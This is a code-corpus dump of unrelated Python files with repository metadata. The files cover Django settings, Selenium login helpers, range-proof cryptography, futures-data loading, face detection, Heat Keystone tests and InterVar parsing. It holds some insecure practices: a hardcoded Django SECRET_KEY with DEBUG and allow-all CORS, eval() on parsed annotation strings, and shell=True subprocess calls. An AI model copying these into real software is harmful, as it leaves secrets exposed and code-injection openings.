'journal_title': 'Astropart.Phys.',
'year': '2018',
'pubinfo_freetext': 'Symmetry 10, 287 (2018)',
},
]
assert expected == record.publication_information
def test_literature_record_publication_information_no_journal_title_or_pubinfo_freetext():
record = LiteratureRecord({
'publication_info': [
{
'cnum': 'C93-07-01',
'conference_recid': 968950,
'conference_record': {
'$ref': 'http://labs.inspirehep.net/api/conferences/968950'
},
},
],
})
assert not record.publication_information
def test_literature_record_publication_information_no_publication_info():
record = LiteratureRecord({})
assert not record.publication_information
| gpl-3.0 | 8,572,558,101,036,677,000 | 27.816514 | 90 | 0.498408 | false |
brunofin/coinvalue | backend/backend/settings.py | 1 | 2626 | # -*- coding: utf-8 -*-
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'flny4$zxzcc-sno24n6m35=xg($c^&q*mil_31v#99cbj(^iw$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'currency',
'apiv1',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'backend.urls'
CORS_ORIGIN_ALLOW_ALL = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'CET'
USE_I18N = True
USE_L10N = True
USE_TZ = True | gpl-3.0 | -8,834,992,552,321,021,000 | 24.504854 | 71 | 0.686976 | false |
Coriolan8/python_traning | fixture/session.py | 1 | 1518 |
__author__ = "yulya"
class SessionHelper:
def __init__(self, app):
self.app = app
def Login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_id("content").click()
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
        wd.find_element_by_xpath('//input[@type="submit"]').click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def is_logged_in(self):
wd = self.app.wd
        return len(wd.find_elements_by_link_text("Logout")) > 0
def is_logged_in_as(self, username):
wd = self.app.wd
return self.get_logged_user() == username
def get_logged_user(self):
wd = self.app.wd
        return wd.find_element_by_xpath("//div/div[1]/form/b").text[1:-1]
def ensure_logout(self):
wd = self.app.wd
if self.is_logged_in():
self.logout()
def ensure_login(self, username, password):
wd = self.app.wd
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
            self.Login(username, password)
grmToolbox/grmpy | promotion/grmpy_tutorial/create_slides.py | 1 | 1443 | #!/usr/bin/env python
"""This module compiles the lecture notes."""
import argparse
import glob
import os
import shutil
import subprocess
def compile_single(is_update):
"""Compile a single lecture."""
for task in ["pdflatex", "bibtex", "pdflatex", "pdflatex"]:
cmd = [task, "main"]
subprocess.check_call(cmd)
if is_update:
shutil.copy(
"main.pdf", "../../distribution/" + os.getcwd().split("/")[-1] + ".pdf"
)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Create slides for lecture")
parser.add_argument(
"--update", action="store_true", dest="update", help="update public slides"
)
is_complete = "lectures" == os.getcwd().split("/")[-1]
is_update = parser.parse_args().update
if is_complete:
for dirname in glob.glob("0*"):
os.chdir(dirname)
compile_single(is_update)
os.chdir("../")
# I also want to have a complete deck of slides available. This is not intended
# for public distribution.
fnames = []
for fname in sorted(glob.glob("0*")):
fnames += [fname + "/main.pdf"]
cmd = "pdftk " + " ".join(fnames) + " cat output course_deck.pdf"
subprocess.check_call(cmd, shell=True)
if is_update:
shutil.copy("course_deck.pdf", "../distribution/course_deck.pdf")
else:
compile_single(is_update)
| mit | 3,772,548,930,021,324,300 | 27.294118 | 87 | 0.57727 | false |
qstokkink/py-ipv8 | ipv8/attestation/wallet/pengbaorange/boudot.py | 1 | 4606 | """
Implementation of proofs for checking commitment equality and if a commitment is a square ("Efficient Proofs that a
Committed NumberLies in an Interval" by F. Boudot).
Modified for use with range proofs ("An efficient range proof scheme." by K. Peng and F. Bao).
"""
from binascii import hexlify
from math import ceil, log
from os import urandom
from struct import pack, unpack
from ..primitives.attestation import sha256_as_int
from ..primitives.structs import ipack, iunpack
from ..primitives.value import FP2Value
def secure_randint(nmin, nmax):
normalized_range = nmax - nmin
n = int(ceil(log(normalized_range, 2) / 8.0))
rbytes_int = int(hexlify(urandom(n)), 16)
return nmin + (rbytes_int % normalized_range)
def _sipack(*n):
if len(n) > 8:
raise RuntimeError("More than 8 values specified to _sipack")
sign_byte = 0
packed = b''
for i in n:
sign_byte = sign_byte << 1
sign_byte |= 1 if i < 0 else 0
packed = ipack(-i if i < 0 else i) + packed
return pack(">B", sign_byte) + packed
def _siunpack(buf, amount):
rem = buf[1:]
nums = []
sign_byte, = unpack(">B", buf[0:1])
while rem and len(nums) < amount:
unpacked, rem = iunpack(rem)
negative = sign_byte & 0x01
sign_byte = sign_byte >> 1
nums.append(-unpacked if negative else unpacked)
return reversed(nums), rem
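# Illustration of the packing scheme above (example values): _sipack(5, -3)
# yields b"\x01" + ipack(3) + ipack(5) -- the least-significant bit of the
# sign byte belongs to the last argument and the magnitudes are stored in
# reverse order, so _siunpack(_sipack(5, -3), 2)[0] iterates back over [5, -3].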
class EL(object):
def __init__(self, c, D, D1, D2):
self.c = c
self.D = D
self.D1 = D1
self.D2 = D2
@classmethod
def create(cls, x, r1, r2, g1, h1, g2, h2, b, bitspace, t=80, l=40): # pylint: disable=R0913,R0914
        maxrange_w = 2 ** (l + t) * b - 1
        maxrange_n = 2 ** (l + t + bitspace) * g1.mod - 1
w = secure_randint(1, maxrange_w)
n1 = secure_randint(1, maxrange_n)
n2 = secure_randint(1, maxrange_n)
W1 = g1.intpow(w) * h1.intpow(n1)
W2 = g2.intpow(w) * h2.intpow(n2)
cW1 = (W1.wp_nominator() * W1.wp_denom_inverse()).normalize()
cW2 = (W2.wp_nominator() * W2.wp_denom_inverse()).normalize()
c = sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
D = w + c * x
D1 = n1 + c * r1
D2 = n2 + c * r2
return cls(c, D, D1, D2)
def check(self, g1, h1, g2, h2, y1, y2):
cW1 = g1.intpow(self.D) * h1.intpow(self.D1) * y1.intpow(-self.c)
cW2 = g2.intpow(self.D) * h2.intpow(self.D2) * y2.intpow(-self.c)
cW1 = (cW1.wp_nominator() * cW1.wp_denom_inverse()).normalize()
cW2 = (cW2.wp_nominator() * cW2.wp_denom_inverse()).normalize()
return self.c == sha256_as_int(str(cW1.a).encode('utf-8') + str(cW1.b).encode('utf-8')
+ str(cW2.a).encode('utf-8') + str(cW2.b).encode('utf-8'))
def serialize(self):
return _sipack(self.c, self.D, self.D1, self.D2)
@classmethod
def unserialize(cls, s):
unpacked, rem = _siunpack(s, 4)
return cls(*unpacked), rem
def __eq__(self, other):
if not isinstance(other, EL):
return False
return (self.c == other.c) and (self.D == other.D) and (self.D1 == other.D1) and (self.D2 == other.D2)
def __hash__(self):
return 6976
def __str__(self):
return 'EL<%d,%d,%d,%d>' % (self.c, self.D, self.D1, self.D2)
class SQR(object):
def __init__(self, F, el):
self.F = F
self.el = el
@classmethod
def create(cls, x, r1, g, h, b, bitspace):
        r2 = secure_randint(-2 ** bitspace * g.mod + 1, 2 ** bitspace * g.mod - 1)
F = g.intpow(x) * h.intpow(r2)
r3 = r1 - r2 * x
return cls(F, EL.create(x, r2, r3, g, h, F, h, b, bitspace))
def check(self, g, h, y):
return self.el.check(g, h, self.F, h, self.F, y)
def serialize(self):
min_f = self.F.wp_compress()
return ipack(min_f.mod) + ipack(min_f.a) + ipack(min_f.b) + self.el.serialize()
@classmethod
def unserialize(cls, s):
rem = s
mod, rem = iunpack(rem)
Fa, rem = iunpack(rem)
Fb, rem = iunpack(rem)
el, rem = EL.unserialize(rem)
return cls(FP2Value(mod, Fa, Fb), el), rem
def __eq__(self, other):
if not isinstance(other, SQR):
return False
return (self.F == other.F) and (self.el == other.el)
def __hash__(self):
return 838182
def __str__(self):
return 'SQR<%s,%s>' % (str(self.F), str(self.el))
| lgpl-3.0 | 3,775,615,382,115,306,500 | 31.43662 | 115 | 0.558402 | false |
lamter/slaveo | loadhistory/futures.py | 1 | 4133 | # coding: utf-8
import pymongo
import pandas as pd
import datetime
try:
from .newbar import NewMinuteBar, NewDayBar
except SystemError:
pass
class LoadBase(object):
"""
    Load futures historical data.
"""
def __init__(self, path, symbol):
"""
        :param path: path to the data file
        :param symbol: contract name (symbol)
:return:
"""
self.symbol = symbol
self.client = pymongo.MongoClient("localhost", 27017)
self.data = self.load(path)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.client:
# 关闭链接
self.client.close()
def load(self, path):
        # Get the action day; some dates are trade days (night-session issue).
# self.get_action_day(None)
raise NotImplementedError
def get_action_day(self, df):
"""
        Convert trade-day timestamps in the 'datetime' column to action (calendar) days.
:return:
"""
        # The market has certainly closed by 8 pm.
close_time = datetime.time(20)
def action_day(dt):
if dt.time() > close_time:
                # shift the date back one day
return dt - datetime.timedelta(days=1)
else:
                # unchanged
return dt
df['datetime'] = df['datetime'].apply(action_day)
return df
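    # Example of the mapping above (illustrative timestamps): a bar stamped
    # 2016-01-05 21:05 falls in the night session, so its action day becomes
    # 2016-01-04 21:05, while 2016-01-05 10:30 is left unchanged.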
def to_vnpy(self):
"""
        Import the data into the vnpy database.
:return:
"""
raise NotImplementedError
class LoadTdxMinHis(LoadBase):
"""
    Load minute bars from TDX (TongDaXin) historical data.
"""
def load(self, path):
df = pd.read_csv(
path,
# index_col='datetime',
names=['date', 'time', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date", "time"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
        # get the action day
return self.get_action_day(df)
def to_vnpy(self, dbn_1min, dbn_5min, dbn_10min):
"""
        Import the data into the vnpy database.
:return:
"""
self.to_vnpy_bar1(dbn_1min)
self.to_vnpy_bar5(dbn_5min)
self.to_vnpy_bar10(dbn_10min)
def to_vnpy_bar1(self, dbn_1min):
dbn_1min = self.client[dbn_1min]
db_bar1 = dbn_1min[self.symbol]
data = self.data
print(u"清空数据库%s" % db_bar1)
db_bar1.drop()
db_bar1.insert_many(data.to_dict('record'))
def to_vnpy_bar5(self, dbn_5min):
db_bar5 = self.client[dbn_5min][self.symbol]
data = self.data
        # convert to 5-minute bars
bar5 = NewMinuteBar(data, 5).new()
print(u"清空数据库%s" % db_bar5)
db_bar5.drop()
db_bar5.insert_many(bar5.to_dict('record'))
def to_vnpy_bar10(self, dbn_10min):
db_bar10 = self.client[dbn_10min][self.symbol]
data = self.data
        # convert to 10-minute bars
bar10 = NewMinuteBar(data, 10).new()
print(u"清空数据库%s" % db_bar10)
db_bar10.drop()
db_bar10.insert_many(bar10.to_dict('record'))
class LoadTdxDailyHis(LoadBase):
"""
    Load daily bars from TDX (TongDaXin) historical data.
"""
def load(self, path):
return pd.read_csv(
path,
# index_col='datetime',
names=['date', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
def to_vnpy(self, dbn_1day):
"""
:return:
"""
self.to_vnpy_day_bar1(dbn_1day)
def to_vnpy_day_bar1(self, dbn_1day):
"""
        Close prices computed from minute bars are inaccurate, because there are both a close price and a settlement price; some settlement prices are the average over the last 3 minutes before the close.
:return:
"""
        self.db_day_bar1 = self.client[dbn_1day][self.symbol]
db_day_bar1 = self.db_day_bar1
data = self.data
db_day_bar1.drop()
db_day_bar1.insert(data.to_dict('record'))
| gpl-3.0 | -6,288,002,198,736,356,000 | 23.324841 | 103 | 0.515318 | false |
PuercoPop/FaceRec | apps/WebUi/testhaar.py | 1 | 1298 | import cv
import os
from os.path import join
from django.conf import settings
def find_faces( img_url ):
cascade = cv.Load( join(settings.ROOT_DIR,'apps/WebUi/haarcascade_frontalface_alt.xml') )
directory= join(settings.MEDIA_ROOT , 'Uploads/')
target_directory = join( directory, 'Portraits/')
portrait_list = []
img = cv.LoadImage( directory + img_url)
imgGray = cv.CreateImage( cv.GetSize(img), img.depth , 1)
cv.CvtColor(img, imgGray, cv.CV_BGR2GRAY)
faces = cv.HaarDetectObjects( imgGray, cascade , cv.CreateMemStorage(),)
if len(faces)>0:
print "Detecto Algo"
else:
print "Miss"
for counter , ((x, y, w, h), n) in enumerate(faces):
cv.SetImageROI(img, (x,y,w,h ) )#Fija la region de interes
imgface = cv.CreateImage( cv.GetSize(img),img.depth,img.nChannels)
imgface_rsz = cv.CreateImage( (128,128) ,img.depth,img.nChannels)
cv.Copy(img,imgface)
cv.Resize(imgface, imgface_rsz, cv.CV_INTER_AREA)
cv.SaveImage( target_directory + str(img_url[:-4]) + "_" + str(counter ) +".png",imgface_rsz)
portrait_list.append( 'Uploads/Portraits/' + str(img_url[:-4]) + "_" + str(counter ) +".png")
cv.ResetImageROI(img)
return portrait_list
if __name__ == "__main__":
    find_faces('../MockUpCode/Images/')
| bsd-2-clause | 2,583,801,675,626,725,000 | 30.658537 | 97 | 0.656394 | false |
noironetworks/heat | heat/tests/openstack/keystone/test_endpoint.py | 1 | 15826 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from heat.engine.clients.os.keystone import fake_keystoneclient as fake_ks
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine.resources.openstack.keystone import endpoint
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
keystone_endpoint_template = {
'heat_template_version': '2015-04-30',
'resources': {
'test_endpoint': {
'type': 'OS::Keystone::Endpoint',
'properties': {
'service': 'heat',
'region': 'RegionOne',
'interface': 'public',
'url': 'http://127.0.0.1:8004/v1/tenant-id',
'name': 'endpoint_foo',
'enabled': False
}
}
}
}
class KeystoneEndpointTest(common.HeatTestCase):
def setUp(self):
super(KeystoneEndpointTest, self).setUp()
self.ctx = utils.dummy_context()
# Mock client
self.keystoneclient = mock.Mock()
self.patchobject(resource.Resource, 'client',
return_value=fake_ks.FakeKeystoneClient(
client=self.keystoneclient))
self.endpoints = self.keystoneclient.endpoints
# Mock client plugin
self.keystone_client_plugin = mock.MagicMock()
def _get_mock_endpoint(self):
value = mock.MagicMock()
value.id = '477e8273-60a7-4c41-b683-fdb0bc7cd152'
return value
def _setup_endpoint_resource(self, stack_name, use_default=False):
tmpl_data = copy.deepcopy(keystone_endpoint_template)
if use_default:
props = tmpl_data['resources']['test_endpoint']['properties']
del props['name']
del props['enabled']
test_stack = stack.Stack(
self.ctx, stack_name,
template.Template(tmpl_data)
)
r_endpoint = test_stack['test_endpoint']
r_endpoint.client = mock.MagicMock()
r_endpoint.client.return_value = self.keystoneclient
r_endpoint.client_plugin = mock.MagicMock()
r_endpoint.client_plugin.return_value = self.keystone_client_plugin
return r_endpoint
def test_endpoint_handle_create(self):
rsrc = self._setup_endpoint_resource('test_endpoint_create')
mock_endpoint = self._get_mock_endpoint()
self.endpoints.create.return_value = mock_endpoint
# validate the properties
self.assertEqual(
'heat', rsrc.properties.get(endpoint.KeystoneEndpoint.SERVICE))
self.assertEqual(
'public',
rsrc.properties.get(endpoint.KeystoneEndpoint.INTERFACE))
self.assertEqual(
'RegionOne',
rsrc.properties.get(endpoint.KeystoneEndpoint.REGION))
self.assertEqual(
'http://127.0.0.1:8004/v1/tenant-id',
rsrc.properties.get(endpoint.KeystoneEndpoint.SERVICE_URL))
self.assertEqual(
'endpoint_foo',
rsrc.properties.get(endpoint.KeystoneEndpoint.NAME))
self.assertFalse(rsrc.properties.get(
endpoint.KeystoneEndpoint.ENABLED))
rsrc.handle_create()
# validate endpoint creation
self.endpoints.create.assert_called_once_with(
service='heat',
url='http://127.0.0.1:8004/v1/tenant-id',
interface='public',
region='RegionOne',
name='endpoint_foo',
enabled=False)
# validate physical resource id
self.assertEqual(mock_endpoint.id, rsrc.resource_id)
def test_endpoint_handle_create_default(self):
rsrc = self._setup_endpoint_resource('test_create_with_defaults',
use_default=True)
mock_endpoint = self._get_mock_endpoint()
self.endpoints.create.return_value = mock_endpoint
rsrc.physical_resource_name = mock.MagicMock()
rsrc.physical_resource_name.return_value = 'stack_endpoint_foo'
# validate the properties
self.assertIsNone(
rsrc.properties.get(endpoint.KeystoneEndpoint.NAME))
self.assertTrue(rsrc.properties.get(
endpoint.KeystoneEndpoint.ENABLED))
rsrc.handle_create()
# validate endpoints creation with physical resource name
# and with enabled(default is True)
self.endpoints.create.assert_called_once_with(
service='heat',
url='http://127.0.0.1:8004/v1/tenant-id',
interface='public',
region='RegionOne',
name='stack_endpoint_foo',
enabled=True)
def test_endpoint_handle_update(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {endpoint.KeystoneEndpoint.REGION: 'RegionTwo',
endpoint.KeystoneEndpoint.INTERFACE: 'internal',
endpoint.KeystoneEndpoint.SERVICE: 'updated_id',
endpoint.KeystoneEndpoint.SERVICE_URL:
'http://127.0.0.1:8004/v2/tenant-id',
endpoint.KeystoneEndpoint.NAME:
'endpoint_foo_updated',
endpoint.KeystoneEndpoint.ENABLED: True}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=prop_diff[endpoint.KeystoneEndpoint.REGION],
interface=prop_diff[endpoint.KeystoneEndpoint.INTERFACE],
service=prop_diff[endpoint.KeystoneEndpoint.SERVICE],
url=prop_diff[endpoint.KeystoneEndpoint.SERVICE_URL],
name=prop_diff[endpoint.KeystoneEndpoint.NAME],
enabled=prop_diff[endpoint.KeystoneEndpoint.ENABLED]
)
def test_endpoint_handle_update_default(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update_default')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
rsrc.physical_resource_name = mock.MagicMock()
rsrc.physical_resource_name.return_value = 'stack_endpoint_foo'
# Name is reset to None, so default to physical resource name
prop_diff = {endpoint.KeystoneEndpoint.NAME: None}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
# validate default name to physical resource name
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=None,
interface=None,
service=None,
url=None,
name='stack_endpoint_foo',
enabled=None
)
def test_endpoint_handle_update_only_enabled(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update_enabled')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {endpoint.KeystoneEndpoint.ENABLED: True}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=None,
interface=None,
service=None,
url=None,
name=None,
enabled=prop_diff[endpoint.KeystoneEndpoint.ENABLED]
)
def test_properties_title(self):
property_title_map = {
endpoint.KeystoneEndpoint.SERVICE: 'service',
endpoint.KeystoneEndpoint.REGION: 'region',
endpoint.KeystoneEndpoint.INTERFACE: 'interface',
endpoint.KeystoneEndpoint.SERVICE_URL: 'url',
endpoint.KeystoneEndpoint.NAME: 'name',
endpoint.KeystoneEndpoint.ENABLED: 'enabled'
}
for actual_title, expected_title in property_title_map.items():
self.assertEqual(
expected_title,
actual_title,
'KeystoneEndpoint PROPERTIES(%s) title modified.' %
actual_title)
def test_property_service_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.SERVICE])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertEqual('Name or Id of keystone service.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
# Make sure, SERVICE is of keystone.service custom constrain type
self.assertEqual(1, len(schema.constraints))
keystone_service_constrain = schema.constraints[0]
self.assertIsInstance(keystone_service_constrain,
constraints.CustomConstraint)
self.assertEqual('keystone.service',
keystone_service_constrain.name)
def test_property_region_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.REGION])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
self.assertEqual('Name or Id of keystone region.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
# Make sure, REGION is of keystone.region custom constraint type
self.assertEqual(1, len(schema.constraints))
keystone_region_constraint = schema.constraints[0]
self.assertIsInstance(keystone_region_constraint,
constraints.CustomConstraint)
self.assertEqual('keystone.region',
keystone_region_constraint.name)
def test_property_interface_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.INTERFACE])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertEqual('Interface type of keystone service endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
# Make sure INTERFACE valid constrains
self.assertEqual(1, len(schema.constraints))
allowed_constrain = schema.constraints[0]
self.assertIsInstance(allowed_constrain,
constraints.AllowedValues)
self.assertEqual(('public', 'internal', 'admin'),
allowed_constrain.allowed)
def test_property_service_url_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.SERVICE_URL])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertEqual('URL of keystone service endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
def test_property_name_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.NAME])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
self.assertEqual('Name of keystone endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
def test_show_resource(self):
rsrc = self._setup_endpoint_resource('test_show_resource')
mock_endpoint = mock.Mock()
mock_endpoint.to_dict.return_value = {'attr': 'val'}
self.endpoints.get.return_value = mock_endpoint
attrs = rsrc._show_resource()
self.assertEqual({'attr': 'val'}, attrs)
def test_get_live_state(self):
rsrc = self._setup_endpoint_resource('test_get_live_state')
mock_endpoint = mock.Mock()
mock_endpoint.to_dict.return_value = {
'region_id': 'RegionOne',
'links': {'self': 'some_link'},
'url': 'http://127.0.0.1:8004/v1/1234',
'region': 'RegionOne',
'enabled': True,
'interface': 'admin',
'service_id': '934f10ea63c24d82a8d9370cc0a1cb3b',
'id': '7f1944ae8c524e2799119b5f2dcf9781',
'name': 'fake'}
self.endpoints.get.return_value = mock_endpoint
reality = rsrc.get_live_state(rsrc.properties)
expected = {
'region': 'RegionOne',
'enabled': True,
'interface': 'admin',
'service': '934f10ea63c24d82a8d9370cc0a1cb3b',
'name': 'fake',
'url': 'http://127.0.0.1:8004/v1/1234'
}
self.assertEqual(expected, reality)
| apache-2.0 | -3,277,745,730,369,007,000 | 38.368159 | 78 | 0.593896 | false |
jessada/pyCMM | pycmm/cmmlib/intervarlib.py | 1 | 2195 | import re
RAW_INTERVAR_CLASS_BENIGN = "Benign"
RAW_INTERVAR_CLASS_LIKELY_BENIGN = "Likelybenign"
RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "UncertainSignificance"
RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likelypathogenic"
RAW_INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
INTERVAR_CLASS_BENIGN = "Benign"
INTERVAR_CLASS_LIKELY_BENIGN = "Likely Benign"
INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "Uncertain Significance"
INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likely Pathogenic"
INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
CLASSIFICATION_PATTERN = re.compile(r'''InterVar:(?P<acmg_class>.+?);''')
EVIDENCE_PATTERN = re.compile(r'''(?P<var_name>[a-zA-Z0-9]*?)=(?P<value>(?:[0-9]+?|\[[0-9;]*?\]))''')
def parse_intervar_class(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
if class_match is not None:
intervar_class = class_match.group('acmg_class')
if intervar_class == RAW_INTERVAR_CLASS_BENIGN:
return INTERVAR_CLASS_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_BENIGN:
return INTERVAR_CLASS_LIKELY_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE:
return INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC:
return INTERVAR_CLASS_LIKELY_PATHOGENIC
if intervar_class == RAW_INTERVAR_CLASS_PATHOGENIC:
return INTERVAR_CLASS_PATHOGENIC
return ""
def evidence2str(raw_evidence):
evidence_list = []
for item in raw_evidence:
var_name = item[0]
value = eval(item[1].replace(';',','))
if type(value) is int and value == 1:
evidence_list.append(var_name)
elif type(value) is list:
for value_idx in xrange(len(value)):
var_name_val = value[value_idx]
if var_name_val == 1:
evidence_list.append(var_name+str(value_idx+1))
return ", ".join(evidence_list)
def parse_intervar_evidence(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
evidence_matchs = EVIDENCE_PATTERN.findall(raw_intervar, re.DOTALL)
return evidence2str(evidence_matchs)
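# Worked example (hypothetical annotation string shaped to match the regular
# expressions above; real InterVar output may differ):
#
#     raw = "InterVar:Benign;PVS1=0;BS=[1;1;0;0];BP=[0;0;0;0;0;0;0]"
#     parse_intervar_class(raw)      # -> "Benign"
#     parse_intervar_evidence(raw)   # -> "BS1, BS2"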
| gpl-2.0 | 5,027,679,920,982,609,000 | 41.211538 | 101 | 0.676538 | false |
jamalmoir/ml_demo | libs/garden/xpopup/xbase.py | 1 | 4736 | """
XBase class
============
Subclass of :class:`xpopup.XPopup`.
Base class for all popup extensions. Don't use this class directly.
Examples
--------
How to create your own class based on :class:`XBase`? It's easy!
The content of the popup should be implemented in the :meth:`XBase._get_body`::
class MyPopup(XBase):
def _get_body(self):
return Label(text='Hello World!')
popup = MyPopup()
By default, popup will automatically opened when the instance was created.
If you don't want that, you can set :attr:`auto_open` to False::
popup = MyPopup(auto_open=False)
If you want to add buttons to the popup, just use :attr:`buttons`::
popup = MyPopup(buttons=[MyPopup.BUTTON_OK, MyPopup.BUTTON_CANCEL])
Pressing the button will trigger the 'dismiss' event. The button that was
pressed, can be obtained from the :attr:`button_pressed`. You can use it
in your callback::
def my_callback(instance):
print('Button "', instance.button_pressed, '" was pressed.')
popup = MyPopup(auto_open=False, buttons=['Ok', 'Cancel'])
